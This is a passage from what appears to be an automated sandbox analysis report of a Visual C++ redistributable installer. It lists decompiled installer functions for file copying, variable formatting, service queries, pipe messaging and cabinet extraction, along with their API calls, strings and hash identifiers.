                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastMove
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 55378915-2299628883
                                                                          • Opcode ID: 8db2ef67cec1a6da698d44cbc15b65c296486b779a3d127f2b9415c098886caf
                                                                          • Instruction ID: 2bb33074908a0a910b402d2bd5f0aaf82fd7c6e99fce5fa0aa3555ef1613bd39
                                                                          • Opcode Fuzzy Hash: 8db2ef67cec1a6da698d44cbc15b65c296486b779a3d127f2b9415c098886caf
                                                                          • Instruction Fuzzy Hash: 73212636A40B369BEB211E648C816FF76D8EF607A7F020126FD0597190DB318CC5C2E8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 42%
                                                                          			E00017203(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t29;
                                                                          				char* _t38;
                                                                          				signed int _t46;
                                                                          				void* _t49;
                                                                          
                                                                          				_t41 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t29 = E00015C87(_t41, _a4, _a8,  &_v12);
                                                                          				_t46 = _v12;
                                                                          				_t49 = _t29;
                                                                          				if(_t49 < 0 ||  *((intOrPtr*)(_t46 + 0x18)) != 0) {
                                                                          					if(_t49 == 0x80070490) {
                                                                          						goto L18;
                                                                          					}
                                                                          					if(_t49 >= 0) {
                                                                          						if( *((intOrPtr*)(_t46 + 0x18)) != 2 ||  *((intOrPtr*)(_t46 + 0x2c)) != 0 ||  *((intOrPtr*)(_t46 + 0x24)) != 0) {
                                                                          							_t24 = _t46 + 8; // 0x8
                                                                          							_t49 = E000300E0(_t24, _a12);
                                                                          							if(_t49 >= 0) {
                                                                          								goto L18;
                                                                          							}
                                                                          							_push(_a8);
                                                                          							_push("Failed to get value as string for variable: %ls");
                                                                          							L17:
                                                                          							_push(_t49);
                                                                          							E0005012F();
                                                                          						} else {
                                                                          							_t16 = _t46 + 8; // 0x8
                                                                          							_t49 = E000300E0(_t16,  &_v8);
                                                                          							if(_t49 >= 0) {
                                                                          								_t49 = E0001567D(_a4, _v8, _a12, 0, 0);
                                                                          								if(_t49 < 0) {
                                                                          									_t38 = L"*****";
                                                                          									if( *((intOrPtr*)(_t46 + 0x20)) == 0) {
                                                                          										_t38 =  *(_t46 + 8);
                                                                          									}
                                                                          									_push(_a8);
                                                                          									E0005012F(_t49, "Failed to format value \'%ls\' of variable: %ls", _t38);
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to get unformatted string.");
                                                                          								_push(_t49);
                                                                          								E0005012F();
                                                                          							}
                                                                          						}
                                                                          						goto L18;
                                                                          					}
                                                                          					_push(_a8);
                                                                          					_push("Failed to get variable: %ls");
                                                                          					goto L17;
                                                                          				} else {
                                                                          					_t49 = 0x80070490;
                                                                          					L18:
                                                                          					LeaveCriticalSection(_a4);
                                                                          					E00012793(_v8);
                                                                          					return _t49;
                                                                          				}
                                                                          			}










                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,0001583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 00017215
                                                                          • LeaveCriticalSection.KERNEL32(00000000,00000000,00000002,00000000,?,?,?,0001583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 000172F4
                                                                          Strings
                                                                          • Failed to get variable: %ls, xrefs: 00017256
                                                                          • Failed to get unformatted string., xrefs: 00017285
                                                                          • *****, xrefs: 000172B0, 000172BD
                                                                          • Failed to get value as string for variable: %ls, xrefs: 000172E3
                                                                          • Failed to format value '%ls' of variable: %ls, xrefs: 000172BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                          • API String ID: 3168844106-2873099529
                                                                          • Opcode ID: a789c5f7b57861908e1eeac543f683df972e47f3b65ba40e66e101f7592e9f74
                                                                          • Instruction ID: 6f4325ac6b16d2dceb68ec2ec665a41924e2e9380e5045a91fbc960887f9e734
                                                                          • Opcode Fuzzy Hash: a789c5f7b57861908e1eeac543f683df972e47f3b65ba40e66e101f7592e9f74
                                                                          • Instruction Fuzzy Hash: 1D31C032904A1ABFDF225A50CC02FDE7B74EF15325F104125FD086A151D736AAD6DBC4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E00053F04(WCHAR* _a4, WCHAR* _a8, int _a12) {
                                                                          				signed short _t12;
                                                                          				short _t16;
                                                                          				WCHAR* _t20;
                                                                          				WCHAR* _t21;
                                                                          				int _t23;
                                                                          				short* _t24;
                                                                          				short* _t25;
                                                                          
                                                                          				_t20 = _a8;
                                                                          				_t23 = _a12;
                                                                          				_t25 = 0;
                                                                          				if(CopyFileW(_a4, _t20, 0 | _t23 == 0x00000000) != 0) {
                                                                          					L16:
                                                                          					return _t25;
                                                                          				}
                                                                          				_t12 = GetLastError();
                                                                          				if(_t23 != 0 || _t12 != 0x50 && _t12 != 0xb7) {
                                                                          					if(_t12 != 3) {
                                                                          						_t25 =  <=  ? _t12 : _t12 & 0x0000ffff | 0x80070000;
                                                                          						goto L16;
                                                                          					}
                                                                          					_t24 = _t25;
                                                                          					_t21 = _t20;
                                                                          					if(( *_t20 & 0x0000ffff) == 0) {
                                                                          						L14:
                                                                          						_t25 = 0x80070003;
                                                                          						goto L16;
                                                                          					}
                                                                          					_push(0x5c);
                                                                          					do {
                                                                          						_t24 =  ==  ? _t21 : _t24;
                                                                          						_t21 =  &(_t21[1]);
                                                                          					} while (( *_t21 & 0x0000ffff) != 0);
                                                                          					if(_t24 == 0) {
                                                                          						goto L14;
                                                                          					}
                                                                          					 *_t24 = 0;
                                                                          					_t25 = E00014013(_t20, _t25);
                                                                          					_t16 = 0x5c;
                                                                          					 *_t24 = _t16;
                                                                          					if(_t25 >= 0 && CopyFileW(_a4, _t20, _a12) == 0) {
                                                                          						_t25 =  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
                                                                          						if(_t25 < 0) {
                                                                          							E000137D3(_t18, "fileutil.cpp", 0x44c, _t25);
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t25 = 1;
                                                                          				}
                                                                          			}











                                                                          APIs
                                                                          • CopyFileW.KERNEL32(00000000,00014CB6,00000000,?,?,00000000,?,00054012,00000000,00014CB6,00000000,00000000,?,000283E2,?,?), ref: 00053F1E
                                                                          • GetLastError.KERNEL32(?,00054012,00000000,00014CB6,00000000,00000000,?,000283E2,?,?,00000001,00000003,000007D0,?,?,?), ref: 00053F2C
                                                                          • CopyFileW.KERNEL32(00000000,00014CB6,00000000,00014CB6,00000000,?,00054012,00000000,00014CB6,00000000,00000000,?,000283E2,?,?,00000001), ref: 00053F92
                                                                          • GetLastError.KERNEL32(?,00054012,00000000,00014CB6,00000000,00000000,?,000283E2,?,?,00000001,00000003,000007D0,?,?,?), ref: 00053F9C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CopyErrorFileLast
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 374144340-2299628883
                                                                          • Opcode ID: fdf23d50b39fa2a94303085dd5d1705518fd7ad2fb6a0185c56f415990e444dd
                                                                          • Instruction ID: 7cc62f6b007efe00ddf463fef721e953bd57f4345f78d16d98e97af15c2839f5
                                                                          • Opcode Fuzzy Hash: fdf23d50b39fa2a94303085dd5d1705518fd7ad2fb6a0185c56f415990e444dd
                                                                          • Instruction Fuzzy Hash: 8121C336E44736AAEB301E654C44B7BB6E8EF40BE2B164436FD05DB150D725CE0583E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 56%
                                                                          			E000155B6(void* __ecx, intOrPtr _a4, short* _a8, intOrPtr* _a12) {
                                                                          				unsigned int _v8;
                                                                          				signed int _v12;
                                                                          				unsigned int _t17;
                                                                          				signed int _t18;
                                                                          				void* _t22;
                                                                          				void* _t23;
                                                                          				signed int _t25;
                                                                          				intOrPtr _t33;
                                                                          				intOrPtr _t37;
                                                                          				unsigned int _t43;
                                                                          				intOrPtr _t46;
                                                                          
                                                                          				_t37 = _a4;
                                                                          				_t43 =  *(_t37 + 0x1c);
                                                                          				_t46 = 0;
                                                                          				_t33 = 0;
                                                                          				if(_t43 == 0) {
                                                                          					L10:
                                                                          					_t46 = 1;
                                                                          					 *_a12 = _t33;
                                                                          				} else {
                                                                          					while(1) {
                                                                          						_t17 = _t43 >> 1;
                                                                          						_v8 = _t17;
                                                                          						_t18 = _t17 + _t33;
                                                                          						_v12 = _t18;
                                                                          						_t22 = CompareStringW(0x7f, 0x1000, _a8, 0xffffffff,  *(_t18 * 0x38 +  *((intOrPtr*)(_t37 + 0x20))), 0xffffffff) - 1;
                                                                          						if(_t22 == 0) {
                                                                          							goto L5;
                                                                          						}
                                                                          						_t23 = _t22 - 1;
                                                                          						if(_t23 == 0) {
                                                                          							 *_a12 = _v8 + _t33;
                                                                          						} else {
                                                                          							_t25 = _t23 - 1;
                                                                          							if(_t25 != 0) {
                                                                          								_t51 =  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
                                                                          								_t46 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "variable.cpp", 0x59f, _t46);
                                                                          								_push("Failed to compare strings.");
                                                                          								_push(_t46);
                                                                          								E0005012F();
                                                                          							} else {
                                                                          								_t33 = _v12 + 1;
                                                                          								_t43 = _t43 + (_t25 | 0xffffffff) - _v8;
                                                                          								L6:
                                                                          								if(_t43 == 0) {
                                                                          									goto L10;
                                                                          								} else {
                                                                          									_t37 = _a4;
                                                                          									continue;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						goto L11;
                                                                          						L5:
                                                                          						_t43 = _v8;
                                                                          						goto L6;
                                                                          					}
                                                                          				}
                                                                          				L11:
                                                                          				return _t46;
                                                                          			}















                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,00000007,0001648B,0001648B,?,0001554A,?,?,00000000), ref: 000155F2
                                                                          • GetLastError.KERNEL32(?,0001554A,?,?,00000000,?,00000000,0001648B,?,00017DDC,?,?,?,?,?), ref: 00015621
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareErrorLastString
                                                                          • String ID: @Met$Failed to compare strings.$variable.cpp$version.dll
                                                                          • API String ID: 1733990998-3869666919
                                                                          • Opcode ID: 58f7573e7aa53dbb203adc5c7e2a138c3c2a2076870297f24582149631069c48
                                                                          • Instruction ID: 68e119e2b112d17a6b4a4aa38d58bed9c0425eb639d7f1647de829454c8c9c7e
                                                                          • Opcode Fuzzy Hash: 58f7573e7aa53dbb203adc5c7e2a138c3c2a2076870297f24582149631069c48
                                                                          • Instruction Fuzzy Hash: 34210432600A14EFD7108FA88C41AAAB7E4EF89762F610319ED14EF2D0DA30EE4186D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E000557BF(void* __ecx, void* _a4, struct _QUERY_SERVICE_CONFIG** _a8) {
                                                                          				int _v8;
                                                                          				signed short _t14;
                                                                          				struct _QUERY_SERVICE_CONFIG* _t24;
                                                                          				struct _QUERY_SERVICE_CONFIG* _t25;
                                                                          				struct _QUERY_SERVICE_CONFIG* _t28;
                                                                          
                                                                          				_t28 = 0;
                                                                          				_t24 = 0;
                                                                          				_v8 = 0;
                                                                          				if(QueryServiceConfigW(_a4, 0, 0,  &_v8) != 0) {
                                                                          					L9:
                                                                          					 *_a8 = _t24;
                                                                          					_t25 = _t28;
                                                                          					L10:
                                                                          					if(_t25 != 0) {
                                                                          						E00013999(_t25);
                                                                          					}
                                                                          					L12:
                                                                          					return _t28;
                                                                          				}
                                                                          				_t14 = GetLastError();
                                                                          				if(_t14 != 0x7a) {
                                                                          					if(_t14 == 0) {
                                                                          						goto L9;
                                                                          					}
                                                                          					_t32 =  <=  ? _t14 : _t14 & 0x0000ffff | 0x80070000;
                                                                          					_t28 =  >=  ? 0x80004005 :  <=  ? _t14 : _t14 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t28);
                                                                          					_push(0x21);
                                                                          					L4:
                                                                          					_push("svcutil.cpp");
                                                                          					E000137D3(0x80004005);
                                                                          					goto L12;
                                                                          				}
                                                                          				_t24 = E000138D4(_v8, 1);
                                                                          				if(_t24 != 0) {
                                                                          					if(QueryServiceConfigW(_a4, _t24, _v8,  &_v8) != 0) {
                                                                          						goto L9;
                                                                          					}
                                                                          					_t35 =  <=  ? GetLastError() : _t19 & 0x0000ffff | 0x80070000;
                                                                          					_t28 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t19 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "svcutil.cpp", 0x1c, _t28);
                                                                          					goto L10;
                                                                          				}
                                                                          				_t28 = 0x8007000e;
                                                                          				_push(0x8007000e);
                                                                          				_push(0x18);
                                                                          				goto L4;
                                                                          			}









                                                                          APIs
                                                                          • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,000368CE,00000000,?), ref: 000557D5
                                                                          • GetLastError.KERNEL32(?,?,000368CE,00000000,?,?,?,?,?,?,?,?,?,00036CE1,?,?), ref: 000557E3
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,000368CE,00000000,?), ref: 0005581D
                                                                          • GetLastError.KERNEL32(?,?,000368CE,00000000,?,?,?,?,?,?,?,?,?,00036CE1,?,?), ref: 00055827
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                          • String ID: @Met$svcutil.cpp
                                                                          • API String ID: 355237494-2661668335
                                                                          • Opcode ID: 48cf5e687842e0ec1047fc0ba68d801ce25e5e8158e101c70c48b3c5ed4ab8bc
                                                                          • Instruction ID: f0237227e0940b62a3fbd39093d8dd089a677ab2c856619dd58bf1b3fdc632ba
                                                                          • Opcode Fuzzy Hash: 48cf5e687842e0ec1047fc0ba68d801ce25e5e8158e101c70c48b3c5ed4ab8bc
                                                                          • Instruction Fuzzy Hash: 2121D536A40724BBE7309A968D04BFB7ADCDF44792F110115FD05FB150EE65CD0496E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 63%
                                                                          			E000309B8(intOrPtr _a4, intOrPtr _a8) {
                                                                          				struct _FILETIME _v12;
                                                                          				struct _FILETIME _v20;
                                                                          				intOrPtr _t23;
                                                                          				void* _t35;
                                                                          				intOrPtr _t43;
                                                                          				signed int _t44;
                                                                          
                                                                          				_t43 = _a4;
                                                                          				_t44 = 0;
                                                                          				_v20.dwLowDateTime = 0;
                                                                          				_v20.dwHighDateTime = 0;
                                                                          				_v12.dwLowDateTime = 0;
                                                                          				_v12.dwHighDateTime = 0;
                                                                          				_t23 =  *((intOrPtr*)(_t43 + 0x2c));
                                                                          				if(_t23 == 0) {
                                                                          					if(DosDateTimeToFileTime( *(_a8 + 0x18) & 0x0000ffff,  *(_a8 + 0x1a) & 0x0000ffff,  &_v20) != 0 && LocalFileTimeToFileTime( &_v20,  &_v12) != 0) {
                                                                          						SetFileTime( *(_t43 + 0x3c),  &_v12,  &_v12,  &_v12);
                                                                          					}
                                                                          					if( *(_t43 + 0x3c) != 0xffffffff) {
                                                                          						CloseHandle( *(_t43 + 0x3c));
                                                                          						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) | 0xffffffff;
                                                                          					}
                                                                          				} else {
                                                                          					_t35 = _t23 - 1;
                                                                          					if(_t35 != 0) {
                                                                          						_t37 = _t35 == 0;
                                                                          						if(_t35 == 0) {
                                                                          							_t44 = 0x80004004;
                                                                          						} else {
                                                                          							_t44 = 0x8007139f;
                                                                          							E000137D3(_t37, "cabextract.cpp", 0x296, 0x8007139f);
                                                                          							_push("Invalid operation for this state.");
                                                                          							_push(0x8007139f);
                                                                          							E0005012F();
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				 *(_t43 + 0x30) = _t44;
                                                                          				_t20 = (_t44 >> 0x0000001f & 0xfffffffe) + 1; // 0x1
                                                                          				return _t20;
                                                                          			}










                                                                          APIs
                                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00030A25
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00030A37
                                                                          • SetFileTime.KERNEL32(?,?,?,?), ref: 00030A4A
                                                                          • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00030616,?,?), ref: 00030A59
                                                                          Strings
                                                                          • cabextract.cpp, xrefs: 000309F4
                                                                          • Invalid operation for this state., xrefs: 000309FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$CloseDateHandleLocal
                                                                          • String ID: Invalid operation for this state.$cabextract.cpp
                                                                          • API String ID: 609741386-1751360545
                                                                          • Opcode ID: 786605869e2683164ca9674ad8d94fa21aba07521ce49a3950f56ab96ede8853
                                                                          • Instruction ID: c7e40361c8a40cd9134915cfd444d9aaba6fb7d730a046ce00139974441a1076
                                                                          • Opcode Fuzzy Hash: 786605869e2683164ca9674ad8d94fa21aba07521ce49a3950f56ab96ede8853
                                                                          • Instruction Fuzzy Hash: FC21C37290171AABCB509FA8EC588EA7BBCFF04721F144216F811E65D0D775EA11CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E00024880(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12, long _a16) {
                                                                          				char _v8;
                                                                          				long _v12;
                                                                          				long _t35;
                                                                          				void* _t38;
                                                                          
                                                                          				_t35 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t38 = E0002444C(_a8, _a12, _a16,  &_v12,  &_v8);
                                                                          				if(_t38 >= 0) {
                                                                          					_a16 = 0;
                                                                          					if(_v8 > 0) {
                                                                          						while(WriteFile(_a4, _v12, _v8 - _t35,  &_a16, 0) != 0) {
                                                                          							_t35 = _t35 + _a16;
                                                                          							if(_t35 < _v8) {
                                                                          								continue;
                                                                          							} else {
                                                                          							}
                                                                          							goto L8;
                                                                          						}
                                                                          						_t42 =  <=  ? GetLastError() : _t27 & 0x0000ffff | 0x80070000;
                                                                          						_t38 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t27 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "pipe.cpp", 0x2f0, _t38);
                                                                          						_push("Failed to write message type to pipe.");
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to allocate message to write.");
                                                                          					L7:
                                                                          					_push(_t38);
                                                                          					E0005012F();
                                                                          				}
                                                                          				L8:
                                                                          				if(_v12 != 0) {
                                                                          					E00013999(_v12);
                                                                          				}
                                                                          				return _t38;
                                                                          			}








                                                                          APIs
                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,000251A4), ref: 000248CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID: @Met$Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
                                                                          • API String ID: 3934441357-1307148864
                                                                          • Opcode ID: ee096a0df4d6f8f9daa4800359df0ef01ef16a5cf0880c97776efaf427b71ffa
                                                                          • Instruction ID: 0c8645f4d25754f71016e03e8373c4aa2dd5b71420a9bd60266f43b81f802431
                                                                          • Opcode Fuzzy Hash: ee096a0df4d6f8f9daa4800359df0ef01ef16a5cf0880c97776efaf427b71ffa
                                                                          • Instruction Fuzzy Hash: E811AF72A00229BEEB21DF95ED05ADF7BE9EF40340F110126FC04A6150D7709E50D6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00028C10,0000001A,00000000,?,00000000,00000000), ref: 0002804C
                                                                          • GetLastError.KERNEL32(?,?,00028C10,0000001A,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,-00000004,00000000), ref: 00028056
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                          • String ID: @Met$Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                          • API String ID: 2186923214-3279289152
                                                                          • Opcode ID: 7924ddf2aa5aca0ceacede8b9e7e17dceb4954f61af08ccf1497efe1f0788d46
                                                                          • Instruction ID: 7fcfc13f41734af2da077eb9e088e17ae605482c9695d993a5c410c78ddeca2e
                                                                          • Opcode Fuzzy Hash: 7924ddf2aa5aca0ceacede8b9e7e17dceb4954f61af08ccf1497efe1f0788d46
                                                                          • Instruction Fuzzy Hash: 58016B766457307AE7306669AC06EEB7ADDCF40B60F11801AFE04EB181EE658E0042E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 67%
                                                                          			E0002444C(char _a4, intOrPtr _a8, char _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                          				char _t17;
                                                                          				intOrPtr _t31;
                                                                          				intOrPtr _t37;
                                                                          				void* _t38;
                                                                          
                                                                          				_t38 = 0;
                                                                          				_t17 =  ==  ? 0 : _a12;
                                                                          				_a12 = _t17;
                                                                          				_t37 = _t17 + 8;
                                                                          				_t31 = E000138D4(_t37, 0);
                                                                          				if(_t31 != 0) {
                                                                          					E00031664(_t31, _t37,  &_a4, 4);
                                                                          					_t7 = _t37 - 4; // 0x5b504
                                                                          					_t8 = _t31 + 4; // 0x4
                                                                          					E00031664(_t8, _t7,  &_a12, 4);
                                                                          					if(_a12 != 0) {
                                                                          						_t11 = _t37 - 8; // 0x5b500
                                                                          						_t13 = _t31 + 8; // 0x8
                                                                          						E00031664(_t13, _t11, _a8, _a12);
                                                                          					}
                                                                          					 *_a20 = _t37;
                                                                          					 *_a16 = _t31;
                                                                          				} else {
                                                                          					_t38 = 0x8007000e;
                                                                          					E000137D3(_t18, "pipe.cpp", 0x2be, 0x8007000e);
                                                                          					_push("Failed to allocate memory for message.");
                                                                          					_push(0x8007000e);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t38;
                                                                          			}








                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • _memcpy_s.LIBCMT ref: 0002449E
                                                                          • _memcpy_s.LIBCMT ref: 000244B1
                                                                          • _memcpy_s.LIBCMT ref: 000244CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
